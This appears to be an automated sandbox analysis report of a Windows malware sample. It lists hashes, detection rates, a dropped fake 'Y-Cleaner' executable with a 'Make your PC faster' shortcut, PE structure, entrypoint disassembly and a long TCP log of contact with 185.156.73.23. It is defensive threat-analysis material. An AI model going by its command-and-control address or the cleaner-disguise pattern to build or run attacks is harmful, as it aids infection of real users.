                                                SHA1:1A4DFFBCE2A4CE65495ED79EAB42A4DA3B660931
                                                SHA-256:F1B3E0F2750A9103E46A6A4A34F1CF9D17779725F98042CC2475EC66484801CF
                                                SHA-512:E241A48EAFCAF99187035F0870D24D74AE97FE84AAADD2591CCEEA9F64B8223D77CFB17A038A58EADD3B822C5201A6F7494F26EEA6F77D95F77F6C668D088E6B
                                                Malicious:true
                                                Antivirus:
                                                • Antivirus: ReversingLabs, Detection: 0%
                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...Jl.X...........!..................... ........... ....................... ............@.....................................W.................................................................................... ............... ..H............text...4.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........`..4e...........U..............................................}.Y.y.=.{.X.x.=..r...p.o2....o...(3.....o2...}....*:..s.....(....*.......*2r...p(;...&*Vr...p.....r...p.....*..(....*>.........}....*...(C.....o...(D...(E...}.....(F...(E...(G...&*>.........}....*...(C.....o...(D...}.....(F...(E...(H...&*".......*>.........}....*R..} .....{ ...oo...*..{ ...*"..}!...*..{!...*...}.....{#....{....op....{....,...{ ...oo...*..{!...oo...*..{....*B.....su...(v...*..{#....{#...

                                                C:\Users\user\AppData\Local\Temp\VwweWtdD5CJ\Y-Cleaner.exe

                                                Download File
                                                Process:C:\Users\user\Desktop\zSmMqGGeVy.exe
                                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                Category:dropped
                                                Size (bytes):1502720
                                                Entropy (8bit):7.646111739368707
                                                Encrypted:false
                                                SSDEEP:24576:7i4dHPD/8u4dJG/8yndSzGmTG2/mR2SGeYdc0GmTG2/mR6Trr2h60qP:7rPD/8I/8ly+Zrr2h60qP
                                                MD5:A8CF5621811F7FAC55CFE8CB3FA6B9F6
                                                SHA1:121356839E8138A03141F5F5856936A85BD2A474
                                                SHA-256:614A0362AB87CEE48D0935B5BB957D539BE1D94C6FDEB3FE42FAC4FBE182C10C
                                                SHA-512:4479D951435F222CA7306774002F030972C9F1715D6AAF512FCA9420DD79CB6D08240F80129F213851773290254BE34F0FF63C7B1F4D554A7DB5F84B69E84BDD
                                                Malicious:true
                                                Antivirus:
                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                • Antivirus: ReversingLabs, Detection: 75%
                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..._............"...0..0...........O... ...`....@.. .......................@............`.................................LO..O....`...................... ......0O............................................... ............... ..H............text..../... ...0.................. ..`.rsrc.......`.......2..............@..@.reloc....... ......................@..B.................O......H.......h~...D......U... .................................................(....*..(....*.~....-.r...p.....(....o....s.........~....*.~....*.......*j(....r=..p~....o....t....*j(....rM..p~....o....t....*j(....r...p~....o....t....*j(....r...p~....o....t....*j(....r...p~....o....t....*j(....r...p~....o....t....*j(....r...p~....o....t....*.~....*..(....*Vs....(....t.........*N.(.....(.....(....*....0..f.......(.........8M........o....9:....o.......o.......-a.{......<...%..o.....%.

                                                C:\Users\user\Desktop\Cleaner.lnk

                                                Download File
                                                Process:C:\Users\user\Desktop\zSmMqGGeVy.exe
                                                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Description string, Has Relative path, Icon number=0, Archive, ctime=Fri Dec 20 14:55:13 2024, mtime=Fri Dec 20 14:55:13 2024, atime=Fri Dec 20 14:55:13 2024, length=1502720, window=hide
                                                Category:modified
                                                Size (bytes):2124
                                                Entropy (8bit):3.8916513920052944
                                                Encrypted:false
                                                SSDEEP:24:8xsuAsuU5HR2YeRpgKD0vgYcAdiYvNV/uLyuuBZFLuur2pFUwqygm:8xoUHR2YeR+gyAYvNV/IyuyZhuHFmyg
                                                MD5:D8FEE144495717E0601FD845245300EA
                                                SHA1:5C393331D1ED40D3A8CD3148C9D119213296304A
                                                SHA-256:9623BFD10582A875ED3C9F028694DF8D01F3E8C397F76D6EEC501A424A77F4D4
                                                SHA-512:7EDE693E9E554EDCEE50CB08A2CB13010DF0B207AFB65092B3E026ADEC9B02857076634E019845D6D37BAE53F5476AA378B341DC36B561E2403FFC163F85461C
                                                Malicious:false
                                                Preview:L..................F.@.. ....I...R...I...R...I...R..........................$.:..DG..Yr?.D..U..k0.&...&......Qg.*_...m.xS.R..W5...R......t...CFSF..1.....EW.=..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW.=.Y.~..........................3*N.A.p.p.D.a.t.a...B.P.1......Y.~..Local.<......EW.=.Y.~..........................7...L.o.c.a.l.....N.1......Y.~..Temp..:......EW.=.Y.~...........................N..T.e.m.p.....`.1......Y.~..VWWEWT~1..H......Y.~.Y.~.....&.....................e..V.w.w.e.W.t.d.D.5.C.J.....h.2......Y.~ .Y-CLEA~1.EXE..L......Y.~.Y.~.....'....................`S..Y.-.C.l.e.a.n.e.r...e.x.e.......n...............-.......m...........0;.{.....C:\Users\user\AppData\Local\Temp\VwweWtdD5CJ\Y-Cleaner.exe....M.a.k.e. .y.o.u.r. .P.C. .f.a.s.t.e.r./.....\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.V.w.w.e.W.t.d.D.5.C.J.\.Y.-.C.l.e.a.n.e.r...e.x.e.>.C.:.\.U.s.e.r.s.\.F.R.O.N.T.D.~.1.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.V.w.w.e.W.t.d.D.5.C.J.\.Y.-.C.l.e.a.n.e.r...e.x.e...

                                                C:\Windows\appcompat\Programs\Amcache.hve

                                                Download File
                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                File Type:MS Windows registry file, NT/2000 or above
                                                Category:dropped
                                                Size (bytes):1835008
                                                Entropy (8bit):4.416698016683499
                                                Encrypted:false
                                                SSDEEP:6144:Pcifpi6ceLPL9skLmb0moSWSPtaJG8nAgex285i2MMhA20X4WABlGuNS5+:0i58oSWIZBk2MM6AFBYo
                                                MD5:16F6BC2596C7FB785257C160910DD69A
                                                SHA1:FB680C29856D076B0E5207D94855FCC11BD46EE3
                                                SHA-256:8916887B63BD20E9D706823652968A7F82E015DB9FC5B3FAFDF167579DBE2F3E
                                                SHA-512:CB28A16AB518309D12FB17883CDB706EC5493276AE9F0C4518ADFA86CF29627F63D85DC47A30F7310DBA743484E290F7D7210453CC414F9B8E40F0F95010F2B9
                                                Malicious:false
                                                Preview:regfE...E....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm..+..R................................................................................................................................................................................................................................................................................................................................................<.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                Static File Info

                                                General

                                                File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                Entropy (8bit):7.940972144959574
                                                TrID:
                                                • Win32 Executable (generic) a (10002005/4) 99.96%
                                                • Generic Win/DOS Executable (2004/3) 0.02%
                                                • DOS Executable Generic (2002/1) 0.02%
                                                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                File name:zSmMqGGeVy.exe
                                                File size:1'903'104 bytes
                                                MD5:83aa26bd8755e994141c4b6d525307ba
                                                SHA1:1cc2485520840247010cd5a2a6f6ba69924a8da5
                                                SHA256:0e5c004b6ac8fd180951d14352e8eb0e4b9b3d4e32dbeaa194a7af7c77d3b4d7
                                                SHA512:ad96208839e796d6572385c838141d2b96c55388afa21d3eeca8a11135f51fd49c5f80a5de9aa1c0925cb3fea9c626bb9a42e16556eaabc2baaf727c58cf3fdb
                                                SSDEEP:49152:0vscG7g87Ql1DHv/4H04CEbCeVPsua1wvzvV/gs:Q8EGCEbvkuiwrvV
                                                TLSH:2E95334365DDDE37E9540030552913F3AB6AFF03205702372A5FA72ACE2F38959AB689
                                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........i..............nG@......ZR......ZC......ZU......................Z\......ZB......ZG.....Rich....................PE..L....,.e...

                                                File Icon

                                                Icon Hash:e7a99a8a8651790c

                                                Static PE Info

                                                General

                                                Entrypoint:0xc43000
                                                Entrypoint Section:.taggant
                                                Digitally signed:false
                                                Imagebase:0x400000
                                                Subsystem:windows gui
                                                Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                DLL Characteristics:TERMINAL_SERVER_AWARE
                                                Time Stamp:0x65B12CA8 [Wed Jan 24 15:28:40 2024 UTC]
                                                TLS Callbacks:
                                                CLR (.Net) Version:
                                                OS Version Major:5
                                                OS Version Minor:0
                                                File Version Major:5
                                                File Version Minor:0
                                                Subsystem Version Major:5
                                                Subsystem Version Minor:0
                                                Import Hash:2eabe9054cad5152567f0699947a2c5b

                                                Entrypoint Preview

                                                Instruction
                                                jmp 00007F9DF4C6E79Ah
                                                psubsb mm3, qword ptr [eax+eax]
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                jmp 00007F9DF4C70795h
                                                add byte ptr [ebx], al
                                                or al, byte ptr [eax]
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax+0Ah], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                push es
                                                add byte ptr [eax], 00000000h
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                adc byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add ecx, dword ptr [edx]
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al

                                                Rich Headers

                                                Programming Language:
                                                • [C++] VS2008 build 21022
                                                • [ASM] VS2008 build 21022
                                                • [ C ] VS2008 build 21022
                                                • [IMP] VS2005 build 50727
                                                • [RES] VS2008 build 21022
                                                • [LNK] VS2008 build 21022

                                                Data Directories

                                                NameVirtual AddressVirtual Size Is in Section
                                                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                IMAGE_DIRECTORY_ENTRY_IMPORT0x41805b0x6f.idata
                                                IMAGE_DIRECTORY_ENTRY_RESOURCE0x40d0000xaea0.rsrc
                                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                IMAGE_DIRECTORY_ENTRY_TLS0x83b2640x18vrjcgfkr
                                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                Sections

                                                NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                0x10000x40c0000x24e004cf1ce91c87f3157cb14965a35d9fd95unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                .rsrc0x40d0000xaea00x70007b67b0c46dbed2a0a52d3a2fa6f866a3False0.9677385602678571data7.897532259921152IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                .idata 0x4180000x10000x200b8539b83d0b3f253ed2a56b71af0554bFalse0.154296875data1.085758102617974IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                0x4190000x2880000x2009e0ec49b4f00f3b15b8732aa9cf62268unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                vrjcgfkr0x6a10000x1a10000x1a1000ccab72a98e632a0c93ecbc69cf1f6b23False0.9899012430680456data7.947994555821212IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                zykttmzm0x8420000x10000x600f04f6fd6a213b9a77fd4df6aaef3c25aFalse0.5670572916666666data4.980166399089074IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                .taggant0x8430000x30000x2200a5e40ea09afe696fb78aa2555b565636False0.05652573529411765DOS executable (COM)0.6642322831812674IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

                                                Resources

                                                NameRVASizeTypeLanguageCountryZLIB Complexity
                                                RT_ICON0x83b2c40xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colorsTurkmenTurkmenistan0.7971748400852878
                                                RT_ICON0x83c16c0x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colorsTurkmenTurkmenistan0.7838447653429603
                                                RT_ICON0x83ca140x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colorsTurkmenTurkmenistan0.7200460829493087
                                                RT_ICON0x83d0dc0x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colorsTurkmenTurkmenistan0.740606936416185
                                                RT_ICON0x83d6440x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9216TurkmenTurkmenistan0.6840248962655602
                                                RT_ICON0x83fbec0x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4096TurkmenTurkmenistan0.7345215759849906
                                                RT_ICON0x840c940x988Device independent bitmap graphic, 24 x 48 x 32, image size 2304TurkmenTurkmenistan0.7622950819672131
                                                RT_ICON0x84161c0x468Device independent bitmap graphic, 16 x 32 x 32, image size 1024TurkmenTurkmenistan0.8111702127659575
                                                RT_STRING0x413c800x330data0.8419117647058824
                                                RT_STRING0x413fb00x170data0.15
                                                RT_STRING0x4141200x620empty0
                                                RT_STRING0x4147400x762empty0
                                                RT_STRING0x414ea40x852empty0
                                                RT_STRING0x4156f80x726empty0
                                                RT_STRING0x415e200x658empty0
                                                RT_STRING0x4164780x6c0empty0
                                                RT_STRING0x416b380x638empty0
                                                RT_STRING0x4171700x88aempty0
                                                RT_ACCELERATOR0x4179fc0x20empty0
                                                RT_GROUP_ICON0x841a840x76dataTurkmenTurkmenistan0.6610169491525424
                                                RT_VERSION0x841afa0x1b4data0.5711009174311926
                                                RT_MANIFEST0x841cae0x256ASCII text, with CRLF line terminators0.5100334448160535

                                                Imports

                                                DLLImport
                                                kernel32.dlllstrcpy

                                                Possible Origin

                                                Language of compilation systemCountry where language is spokenMap
                                                TurkmenTurkmenistan

                                                Network Behavior

                                                Network Port Distribution

                                                TCP Packets

                                                TimestampSource PortDest PortSource IPDest IP
                                                Dec 20, 2024 16:54:28.148778915 CET4981280192.168.2.7185.156.73.23
                                                Dec 20, 2024 16:54:28.269201040 CET8049812185.156.73.23192.168.2.7
                                                Dec 20, 2024 16:54:28.269351006 CET4981280192.168.2.7185.156.73.23
                                                Dec 20, 2024 16:54:28.270270109 CET4981280192.168.2.7185.156.73.23
                                                Dec 20, 2024 16:54:28.391968012 CET8049812185.156.73.23192.168.2.7
                                                Dec 20, 2024 16:54:29.639238119 CET8049812185.156.73.23192.168.2.7
                                                Dec 20, 2024 16:54:29.639341116 CET4981280192.168.2.7185.156.73.23
                                                Dec 20, 2024 16:54:29.663031101 CET4981280192.168.2.7185.156.73.23
                                                Dec 20, 2024 16:54:29.782672882 CET8049812185.156.73.23192.168.2.7
                                                Dec 20, 2024 16:54:30.138691902 CET8049812185.156.73.23192.168.2.7
                                                Dec 20, 2024 16:54:30.138788939 CET4981280192.168.2.7185.156.73.23
                                                Dec 20, 2024 16:54:30.143945932 CET4981280192.168.2.7185.156.73.23
                                                Dec 20, 2024 16:54:30.263587952 CET8049812185.156.73.23192.168.2.7
                                                Dec 20, 2024 16:54:30.705207109 CET8049812185.156.73.23192.168.2.7
                                                Dec 20, 2024 16:54:30.705270052 CET8049812185.156.73.23192.168.2.7
                                                Dec 20, 2024 16:54:30.705282927 CET8049812185.156.73.23192.168.2.7
                                                Dec 20, 2024 16:54:30.705373049 CET4981280192.168.2.7185.156.73.23
                                                Dec 20, 2024 16:54:30.705419064 CET4981280192.168.2.7185.156.73.23
                                                Dec 20, 2024 16:54:30.705550909 CET8049812185.156.73.23192.168.2.7
                                                Dec 20, 2024 16:54:30.705564976 CET8049812185.156.73.23192.168.2.7
                                                Dec 20, 2024 16:54:30.705575943 CET8049812185.156.73.23192.168.2.7
                                                Dec 20, 2024 16:54:30.705588102 CET8049812185.156.73.23192.168.2.7
                                                Dec 20, 2024 16:54:30.705940962 CET8049812185.156.73.23192.168.2.7
                                                Dec 20, 2024 16:54:30.713921070 CET8049812185.156.73.23192.168.2.7
                                                Dec 20, 2024 16:54:30.713938951 CET8049812185.156.73.23192.168.2.7
                                                Dec 20, 2024 16:54:30.719819069 CET8049812185.156.73.23192.168.2.7
                                                Dec 20, 2024 16:54:30.719923973 CET8049812185.156.73.23192.168.2.7
                                                Dec 20, 2024 16:54:30.747706890 CET4981280192.168.2.7185.156.73.23
                                                Dec 20, 2024 16:54:30.825086117 CET8049812185.156.73.23192.168.2.7
                                                Dec 20, 2024 16:54:30.825218916 CET4981280192.168.2.7185.156.73.23
                                                Dec 20, 2024 16:54:30.896821976 CET8049812185.156.73.23192.168.2.7
                                                Dec 20, 2024 16:54:30.896873951 CET8049812185.156.73.23192.168.2.7
                                                Dec 20, 2024 16:54:30.896903038 CET4981280192.168.2.7185.156.73.23
                                                Dec 20, 2024 16:54:30.896925926 CET4981280192.168.2.7185.156.73.23
                                                Dec 20, 2024 16:54:30.901051044 CET8049812185.156.73.23192.168.2.7
                                                Dec 20, 2024 16:54:30.901113033 CET4981280192.168.2.7185.156.73.23
                                                Dec 20, 2024 16:54:30.902580976 CET8049812185.156.73.23192.168.2.7
                                                Dec 20, 2024 16:54:30.902631998 CET4981280192.168.2.7185.156.73.23
                                                Dec 20, 2024 16:54:30.902721882 CET8049812185.156.73.23192.168.2.7
                                                Dec 20, 2024 16:54:30.902772903 CET4981280192.168.2.7185.156.73.23
                                                Dec 20, 2024 16:54:30.911418915 CET8049812185.156.73.23192.168.2.7
                                                Dec 20, 2024 16:54:30.911511898 CET4981280192.168.2.7185.156.73.23
                                                Dec 20, 2024 16:54:30.911643028 CET8049812185.156.73.23192.168.2.7
                                                Dec 20, 2024 16:54:30.911695957 CET4981280192.168.2.7185.156.73.23
                                                Dec 20, 2024 16:54:30.920259953 CET8049812185.156.73.23192.168.2.7
                                                Dec 20, 2024 16:54:30.920305014 CET8049812185.156.73.23192.168.2.7
                                                Dec 20, 2024 16:54:30.920353889 CET4981280192.168.2.7185.156.73.23
                                                Dec 20, 2024 16:54:30.920382977 CET4981280192.168.2.7185.156.73.23
                                                Dec 20, 2024 16:54:30.928210974 CET8049812185.156.73.23192.168.2.7
                                                Dec 20, 2024 16:54:30.928296089 CET8049812185.156.73.23192.168.2.7
                                                Dec 20, 2024 16:54:30.928311110 CET4981280192.168.2.7185.156.73.23
                                                Dec 20, 2024 16:54:30.928349972 CET4981280192.168.2.7185.156.73.23
                                                Dec 20, 2024 16:54:30.936885118 CET8049812185.156.73.23192.168.2.7
                                                Dec 20, 2024 16:54:30.936980009 CET4981280192.168.2.7185.156.73.23
                                                Dec 20, 2024 16:54:30.937007904 CET8049812185.156.73.23192.168.2.7
                                                Dec 20, 2024 16:54:30.937062979 CET4981280192.168.2.7185.156.73.23
                                                Dec 20, 2024 16:54:30.945298910 CET8049812185.156.73.23192.168.2.7
                                                Dec 20, 2024 16:54:30.945336103 CET8049812185.156.73.23192.168.2.7
                                                Dec 20, 2024 16:54:30.945400000 CET4981280192.168.2.7185.156.73.23
                                                Dec 20, 2024 16:54:30.945441961 CET4981280192.168.2.7185.156.73.23
                                                Dec 20, 2024 16:54:30.953855991 CET8049812185.156.73.23192.168.2.7
                                                Dec 20, 2024 16:54:30.953958035 CET8049812185.156.73.23192.168.2.7
                                                Dec 20, 2024 16:54:30.953980923 CET4981280192.168.2.7185.156.73.23
                                                Dec 20, 2024 16:54:30.954008102 CET4981280192.168.2.7185.156.73.23
                                                Dec 20, 2024 16:54:30.962342024 CET8049812185.156.73.23192.168.2.7
                                                Dec 20, 2024 16:54:30.962403059 CET8049812185.156.73.23192.168.2.7
                                                Dec 20, 2024 16:54:30.962443113 CET4981280192.168.2.7185.156.73.23
                                                Dec 20, 2024 16:54:30.962476015 CET4981280192.168.2.7185.156.73.23
                                                Dec 20, 2024 16:54:30.969336033 CET8049812185.156.73.23192.168.2.7
                                                Dec 20, 2024 16:54:30.969405890 CET4981280192.168.2.7185.156.73.23
                                                Dec 20, 2024 16:54:30.969451904 CET8049812185.156.73.23192.168.2.7
                                                Dec 20, 2024 16:54:30.969513893 CET4981280192.168.2.7185.156.73.23
                                                Dec 20, 2024 16:54:30.976393938 CET8049812185.156.73.23192.168.2.7
                                                Dec 20, 2024 16:54:30.976480007 CET8049812185.156.73.23192.168.2.7
                                                Dec 20, 2024 16:54:30.976521969 CET4981280192.168.2.7185.156.73.23
                                                Dec 20, 2024 16:54:30.976583004 CET4981280192.168.2.7185.156.73.23
                                                Dec 20, 2024 16:54:30.983546019 CET8049812185.156.73.23192.168.2.7
                                                Dec 20, 2024 16:54:30.983589888 CET8049812185.156.73.23192.168.2.7
                                                Dec 20, 2024 16:54:30.983645916 CET4981280192.168.2.7185.156.73.23
                                                Dec 20, 2024 16:54:30.983684063 CET4981280192.168.2.7185.156.73.23
                                                Dec 20, 2024 16:54:31.088865995 CET8049812185.156.73.23192.168.2.7
                                                Dec 20, 2024 16:54:31.088965893 CET8049812185.156.73.23192.168.2.7
                                                Dec 20, 2024 16:54:31.089059114 CET4981280192.168.2.7185.156.73.23
                                                Dec 20, 2024 16:54:31.089104891 CET4981280192.168.2.7185.156.73.23
                                                Dec 20, 2024 16:54:31.090296984 CET8049812185.156.73.23192.168.2.7
                                                Dec 20, 2024 16:54:31.090367079 CET4981280192.168.2.7185.156.73.23
                                                Dec 20, 2024 16:54:31.090423107 CET8049812185.156.73.23192.168.2.7
                                                Dec 20, 2024 16:54:31.090473890 CET4981280192.168.2.7185.156.73.23
                                                Dec 20, 2024 16:54:31.095437050 CET8049812185.156.73.23192.168.2.7
                                                Dec 20, 2024 16:54:31.095537901 CET4981280192.168.2.7185.156.73.23
                                                Dec 20, 2024 16:54:31.095580101 CET8049812185.156.73.23192.168.2.7
                                                Dec 20, 2024 16:54:31.095635891 CET4981280192.168.2.7185.156.73.23
                                                Dec 20, 2024 16:54:31.100455046 CET8049812185.156.73.23192.168.2.7
                                                Dec 20, 2024 16:54:31.100524902 CET8049812185.156.73.23192.168.2.7
                                                Dec 20, 2024 16:54:31.100545883 CET4981280192.168.2.7185.156.73.23
                                                Dec 20, 2024 16:54:31.100575924 CET4981280192.168.2.7185.156.73.23
                                                Dec 20, 2024 16:54:31.105266094 CET8049812185.156.73.23192.168.2.7
                                                Dec 20, 2024 16:54:31.105356932 CET4981280192.168.2.7185.156.73.23
                                                Dec 20, 2024 16:54:31.105382919 CET8049812185.156.73.23192.168.2.7
                                                Dec 20, 2024 16:54:31.105427980 CET4981280192.168.2.7185.156.73.23
                                                Dec 20, 2024 16:54:31.110096931 CET8049812185.156.73.23192.168.2.7
                                                Dec 20, 2024 16:54:31.110166073 CET4981280192.168.2.7185.156.73.23
                                                Dec 20, 2024 16:54:31.110229969 CET8049812185.156.73.23192.168.2.7
                                                Dec 20, 2024 16:54:31.110281944 CET4981280192.168.2.7185.156.73.23
                                                Dec 20, 2024 16:54:31.114753008 CET8049812185.156.73.23192.168.2.7
                                                Dec 20, 2024 16:54:31.114839077 CET4981280192.168.2.7185.156.73.23
                                                Dec 20, 2024 16:54:31.114880085 CET8049812185.156.73.23192.168.2.7
                                                Dec 20, 2024 16:54:31.114928961 CET4981280192.168.2.7185.156.73.23
                                                Dec 20, 2024 16:54:31.119358063 CET8049812185.156.73.23192.168.2.7
                                                Dec 20, 2024 16:54:31.119436026 CET4981280192.168.2.7185.156.73.23
                                                Dec 20, 2024 16:54:31.119492054 CET8049812185.156.73.23192.168.2.7
                                                Dec 20, 2024 16:54:31.119545937 CET4981280192.168.2.7185.156.73.23
                                                Dec 20, 2024 16:54:31.123893976 CET8049812185.156.73.23192.168.2.7
                                                Dec 20, 2024 16:54:31.123981953 CET4981280192.168.2.7185.156.73.23
                                                Dec 20, 2024 16:54:31.124039888 CET8049812185.156.73.23192.168.2.7
                                                Dec 20, 2024 16:54:31.124195099 CET4981280192.168.2.7185.156.73.23
                                                Dec 20, 2024 16:54:31.128374100 CET8049812185.156.73.23192.168.2.7
                                                Dec 20, 2024 16:54:31.128432035 CET8049812185.156.73.23192.168.2.7
                                                Dec 20, 2024 16:54:31.128475904 CET4981280192.168.2.7185.156.73.23
                                                Dec 20, 2024 16:54:31.128494024 CET4981280192.168.2.7185.156.73.23
                                                Dec 20, 2024 16:54:31.132520914 CET8049812185.156.73.23192.168.2.7
                                                Dec 20, 2024 16:54:31.132591963 CET4981280192.168.2.7185.156.73.23
                                                Dec 20, 2024 16:54:31.132632971 CET8049812185.156.73.23192.168.2.7
                                                Dec 20, 2024 16:54:31.132694960 CET4981280192.168.2.7185.156.73.23
                                                Dec 20, 2024 16:54:31.136913061 CET8049812185.156.73.23192.168.2.7
                                                Dec 20, 2024 16:54:31.136996031 CET4981280192.168.2.7185.156.73.23
                                                Dec 20, 2024 16:54:31.137084961 CET8049812185.156.73.23192.168.2.7
                                                Dec 20, 2024 16:54:31.137159109 CET4981280192.168.2.7185.156.73.23
                                                Dec 20, 2024 16:54:31.141419888 CET8049812185.156.73.23192.168.2.7
                                                Dec 20, 2024 16:54:31.141475916 CET8049812185.156.73.23192.168.2.7
                                                Dec 20, 2024 16:54:31.141484022 CET4981280192.168.2.7185.156.73.23
                                                Dec 20, 2024 16:54:31.141535997 CET4981280192.168.2.7185.156.73.23
                                                Dec 20, 2024 16:54:31.146029949 CET8049812185.156.73.23192.168.2.7
                                                Dec 20, 2024 16:54:31.146109104 CET8049812185.156.73.23192.168.2.7
                                                Dec 20, 2024 16:54:31.146111012 CET4981280192.168.2.7185.156.73.23
                                                Dec 20, 2024 16:54:31.146162987 CET4981280192.168.2.7185.156.73.23
                                                Dec 20, 2024 16:54:31.150269985 CET8049812185.156.73.23192.168.2.7
                                                Dec 20, 2024 16:54:31.150336027 CET4981280192.168.2.7185.156.73.23
                                                Dec 20, 2024 16:54:31.150392056 CET8049812185.156.73.23192.168.2.7
                                                Dec 20, 2024 16:54:31.150449038 CET4981280192.168.2.7185.156.73.23
                                                Dec 20, 2024 16:54:31.154885054 CET8049812185.156.73.23192.168.2.7
                                                Dec 20, 2024 16:54:31.154942989 CET8049812185.156.73.23192.168.2.7
                                                Dec 20, 2024 16:54:31.154969931 CET4981280192.168.2.7185.156.73.23
                                                Dec 20, 2024 16:54:31.154993057 CET4981280192.168.2.7185.156.73.23
                                                Dec 20, 2024 16:54:31.159244061 CET8049812185.156.73.23192.168.2.7
                                                Dec 20, 2024 16:54:31.159337044 CET4981280192.168.2.7185.156.73.23
                                                Dec 20, 2024 16:54:31.159501076 CET8049812185.156.73.23192.168.2.7
                                                Dec 20, 2024 16:54:31.159563065 CET4981280192.168.2.7185.156.73.23
                                                Dec 20, 2024 16:54:31.163491011 CET8049812185.156.73.23192.168.2.7
                                                Dec 20, 2024 16:54:31.163572073 CET4981280192.168.2.7185.156.73.23
                                                Dec 20, 2024 16:54:31.163642883 CET8049812185.156.73.23192.168.2.7
                                                Dec 20, 2024 16:54:31.163728952 CET4981280192.168.2.7185.156.73.23
                                                Dec 20, 2024 16:54:31.167963028 CET8049812185.156.73.23192.168.2.7
                                                Dec 20, 2024 16:54:31.168023109 CET4981280192.168.2.7185.156.73.23
                                                Dec 20, 2024 16:54:31.168154955 CET8049812185.156.73.23192.168.2.7
                                                Dec 20, 2024 16:54:31.168211937 CET4981280192.168.2.7185.156.73.23
                                                Dec 20, 2024 16:54:31.172333956 CET8049812185.156.73.23192.168.2.7
                                                Dec 20, 2024 16:54:31.172406912 CET4981280192.168.2.7185.156.73.23
                                                Dec 20, 2024 16:54:31.172435045 CET8049812185.156.73.23192.168.2.7
                                                Dec 20, 2024 16:54:31.172485113 CET4981280192.168.2.7185.156.73.23
                                                Dec 20, 2024 16:54:31.176795006 CET8049812185.156.73.23192.168.2.7
                                                Dec 20, 2024 16:54:31.176855087 CET4981280192.168.2.7185.156.73.23
                                                Dec 20, 2024 16:54:31.176892042 CET8049812185.156.73.23192.168.2.7
                                                Dec 20, 2024 16:54:31.176953077 CET4981280192.168.2.7185.156.73.23
                                                Dec 20, 2024 16:54:31.181333065 CET8049812185.156.73.23192.168.2.7
